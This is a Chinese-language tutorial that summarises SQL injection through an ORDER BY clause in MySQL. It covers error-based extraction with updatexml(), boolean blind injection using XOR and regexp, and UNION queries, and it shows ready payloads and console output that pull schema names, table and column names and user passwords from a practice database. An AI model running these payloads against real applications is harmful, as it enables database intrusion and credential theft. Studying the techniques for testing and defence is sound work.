Order by排序注入方法小总结

今天总结一下注入点在order by排序注入,学习一下记录下这个过程
声明:此文谨供学习记录研究使用,切勿用于非法用途,否则后果自负!

注入方法介绍
  • 正常语句
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

mysql> select * from users order by id;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql> select * from users order by id desc;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 14 | admin4 | admin4 |
| 12 | dhakkan | dumbo |
| 11 | admin3 | admin3 |
| 10 | admin2 | admin2 |
| 9 | admin1 | admin1 |
| 8 | admin | admin |
| 7 | batman | mob!le |
| 6 | superman | genious |
| 5 | stupid | stupidity |
| 4 | secure | crappy |
| 3 | Dummy | p@ssword |
| 2 | Angelina | I-kill-you |
| 1 | Dumb | Dumb |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql>

其中select * from users order by id desc;desc是可控的传参值。


order by 与报错注入

当页面出现mysql报错信息时,注入点在 order by后面,此时可以利用报错信息进行注入。

  • 下面进行报错注入
    • 首先获取基本一些基本信息总结
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));
ERROR 1105 (HY000): XPATH syntax error: '~security' //获取当前数据库
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select version())),0));
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53' //获取数据库版本
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //获取用户
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@datadir)),0));
ERROR 1105 (HY000): XPATH syntax error: '~E:\soft\phpmystudy\MySQL\data\' //获取数据库路径
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@version_compile_os)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Win32' //获取操作系统
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@basedir)),0));
ERROR 1105 (HY000): XPATH syntax error: '~E:/soft/phpmystudy/MySQL/' //mysql安装路径
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select session_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //获取连接数据库的用户名
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select current_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //获取当前用户名
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select system_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //获取系统用户名
mysql>

图片.png

  • 获取数据信息

获取数据库个数

1
2
3
4
5
6
7
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
ERROR 1105 (HY000): XPATH syntax error: '~11'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(schema_name) from information_schema.schemata)),0));
ERROR 1105 (HY000): XPATH syntax error: '~11'
mysql>

注:count(*)是对结果函数统计,而count(schema_name)则是对不为空的行数结果进行统计

获取数据库列表信息

1
2
3
4
5
6
7
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~information_schema'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~challenges'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~dvwa'
mysql>

注: 这里使用limit逐条获取,为什么这样呢?因为我发现使用group_concat()批量查询输出结果长度有限制,因此需要这样一条一条获取了,当然数据多的时候就要简单写个python脚本跑了

  • 获取某数据库表信息

获取表个数

payload:

1
and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "数据库名")),0))
1
2
3
4
5
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
mysql>

获取表名

payload:

1
and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "数据库名")),0))
1
2
3
4
5
6
7
8
9
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails,referers,uagents,users'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~referers'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~uagents'
mysql>
  • 获取某数据库中某个表字段信息

字段个数

payload:

1
and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "数据库名" and table_name = "表名")),0))

1
2
3
4
5
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
mysql>

获取字段名,字段多的需要单条获取

payload:

1
and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "数据库名" and table_name = "表名")),0))
1
2
3
4
5
6
7
8
9
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~id,username,password'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~id'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~username'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~password'
mysql>
  • 最后获取想要的信息就简单了
1
2
3
4
5
6
7
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username,password from users limit 0,1)),0));
ERROR 1241 (21000): Operand should contain 1 column(s)
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select password from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql>

经测试,貌似只能指定获取一个字段信息


order by 与盲注

当页面没有展示MYSQL的错误信息时,且只能根据页面回显的状态进行判断时,可以使用布尔盲注

  • 简单看两条语句
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
mysql> select * from users order by id ^(select(select version()) regexp '^aaaa');
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql> select * from users order by id ^(select(select version()) regexp '^5');
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 3 | Dummy | p@ssword |
| 2 | Angelina | I-kill-you |
| 5 | stupid | stupidity |
| 4 | secure | crappy |
| 7 | batman | mob!le |
| 6 | superman | genious |
| 9 | admin1 | admin1 |
| 8 | admin | admin |
| 11 | admin3 | admin3 |
| 10 | admin2 | admin2 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql>

图片.png

简单解释一下就是在regexp正则匹配的时候,如果匹配到数据返回1(00000001)的时候,此时的1会和id中的数据的二进制进行异或,按照异或的结果进行升序排列,所以显示的排列会发生变化;反之当进行正则匹配的时候,未匹配到数据返回0(00000000),此时数字和0异或的结果还是本身,所以显示的排列不会发生改变。

总结:当页面排序紊乱时则说明正则匹配到正确数据,页面排序未发生紊乱时则说明正则没有匹配到数据

通过以上可以判断数据库版本在5以上,这里的'^5'也可以转换成^5的十六进制

order by 与 union 联合查询

  • $query = "select * from users order by id $input ";没有使用括号包裹的时候,是无法直接使用union查询的。

  • $query = "(select * from users order by id $input) ";使用括号进行包裹的时候,此时是可以进行union查询的。

  • 获取版本号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
mysql> (select * from users order by id ) union(select 1,(version()),3);
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
| 1 | 5.5.53 | 3 |
+----+----------+------------+
14 rows in set (0.00 sec)

mysql>

图片.png

  • 其他就不一一截图了,查询语句格式如下:
1
(select * from users order by id ) union(select 1,(payload),3);

数据库信息payload:

1
2
3
4
5
6
7
8
9
database()               //获取当前数据库
version() //获取数据库版本
user() //获取用户
@@datadir //获取数据库路径
@@version_compile_os //获取操作系统
@@basedir //mysql安装路径
session_user() //获取连接数据库的用户名
current_user() //获取当前用户名
system_user() //获取系统用户名

表信息payload: 同上,不再重复!

参考:

https://www.freebuf.com/column/145988.html

坚持原创技术分享,您的支持将鼓励我继续创作!